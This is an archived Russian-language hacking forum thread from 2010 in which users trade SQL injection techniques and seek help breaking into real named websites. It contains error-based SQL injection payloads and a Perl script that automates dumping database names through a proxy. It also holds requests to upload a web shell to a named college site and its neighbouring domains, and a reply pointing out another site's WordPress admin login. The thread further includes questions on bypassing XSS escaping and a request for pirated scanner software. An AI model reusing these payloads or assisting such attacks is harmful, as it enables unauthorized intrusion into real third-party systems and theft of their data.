ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

06.09.2010, 06:10
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме: 2212846
Репутация:
56
|
|
Сообщение от BrainDeaD
BrainDeaD said:
ок. попробую.
а что на счёт бенчмарка с переменными? типа
Код:
Code:
concat(@i:=0x00,@o:=0x0d0a,benchmark(123,@o:=CONCAT(@o,0x0d0a,(SELECT+concat+(table_schema,0x2E,@i:=table_name)+FROM+information_schema.tables+WHERE+table_name>@i+order+by table_name+LIMIT+1))),@o)
никак нельзя в блайнд так засунуть, чтоб он всё в ошибке выводил?
Все равно вывести все таблицы за один запрос в ошибке не получиться, так как, метод floor rand - имеет ограничение в 64 символа, а метод основанный на выборке записи по средствам XPath - 31 символ.
|
|
|

06.09.2010, 17:53
|
|
Guest
Сообщений: n/a
Провел на форуме: 6784
Репутация:
0
|
|
Привет, как узнать полный путь у www папке на сайте http://www.mgccc.edu/ ? При наличии LOAD_FILE, есть ли какие-то брутфорсные варианты подбора папки? Например, софт, который пробует стандартные структуры папок?
|
|
|
|

06.09.2010, 19:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 6784
Репутация:
0
|
|
Возможно ли залить шелл, если есть инъекция, кавычки НЕ экранируются, известен путь к сайту, но на сайте нету папок, в которые муксул может писать? В конфиге обнаружен логин-пароль юзера дб (удаленно не подключается), вроде как админки нету на сайте. Сайт тот же, что и в предыдущем посте: http://www.mgccc.edu/ На том же серваке лежат http://www.mississippibowl.com, http://www.mississippibowl.org, http://www.msbowl.com, http://www.mgcccbulldogs.com, http://www.saccr.org, и их файлы принадлежат одному юзеру. Если кто-то найдет и ткнет в форму уплоада носом, будет просто отлично
|
|
|
|

06.09.2010, 20:10
|
|
Guest
Сообщений: n/a
Провел на форуме: 6784
Репутация:
0
|
|
Помогите, пожалуйста, найти админку в http://www.followyourheart.com/
|
|
|
|

06.09.2010, 21:25
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме: 818095
Репутация:
34
|
|
Сообщение от rooopster
rooopster said:
Помогите, пожалуйста, найти админку в http://www.followyourheart.com/
http://followyourheart.com/news/wp-login.php
Word press
|
|
|

06.09.2010, 22:11
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме: 3363660
Репутация:
1148
|
|
Сообщение от BrainDeaD
BrainDeaD said:
есть запрос
Код:
Code:
+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+206,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
как видим, в базе более двухсот таблиц. пребирать лимит руками не кошерно.
есть ли возможность вывести весь список таблиц в блайнд-скуле?
Код:
Code:
#!/usr/bin/perl -w
# target
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
my $proxy="http://xx.xxx.xxx.xxx:port"; # proxy
$ua->proxy(['http','https'],$proxy);
my $i=0;
while(1)
{
my $req = HTTP::Request->new(GET => "http://[host][path]/?variable=(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+SCHEMA_NAME+FROM+information_schema.SCHEMATA+limit+$i,1),floor(rand(0)*2)))--+");
my $res = $ua->request($req);
if ($res->as_string =~ /Duplicate entry(.+)for/)
{
open(FILE,'>>results.txt');
print "print $i: $1\n";
print FILE "$1\n";
close(FILE);
$i++;
}
else {last;}
}
ну под себя не сложно подмутить.
|
|
|

07.09.2010, 01:58
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме: 1977708
Репутация:
208
|
|
все таки хотел узнать такие домены как: http://site.com.su/ трудно расковырять? и это выбирается в целях безопасности?
скачал JBroFuzz для фаззинга, но не знаю по каким параметрам сканировать. запутил с SQL инекциями, но ясный пень, что ничего не нашлось ))))))
|
|
|

07.09.2010, 03:35
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме: 2212846
Репутация:
56
|
|
Сообщение от B1t.exe
B1t.exe said:
все таки хотел узнать такие домены как:
http://site.com.su/
трудно расковырять? и это выбирается в целях безопасности?
скачал
JBroFuzz
для фаззинга, но не знаю по каким параметрам сканировать. запутил с SQL инекциями, но ясный пень, что ничего не нашлось
))))))
Почитай вот это: /thread228319.html
|
|
|

07.09.2010, 08:26
|
|
Guest
Сообщений: n/a
Провел на форуме: 4212
Репутация:
0
|
|
Reflected XSS и magic_quotes_gpc
Есть пассивная XSS вида
Судя по всему, magic_quotes_gpc включена, поэтому двойные и одинарные кавычки экранируются. Как можно обойти это, при этом не используя конструкции вида
|
|
|
|

07.09.2010, 11:09
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме: 117639
Репутация:
55
|
|
Redwood, а можешь залить куда-нибудь MaxPatrol, а то все ссылки битые
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|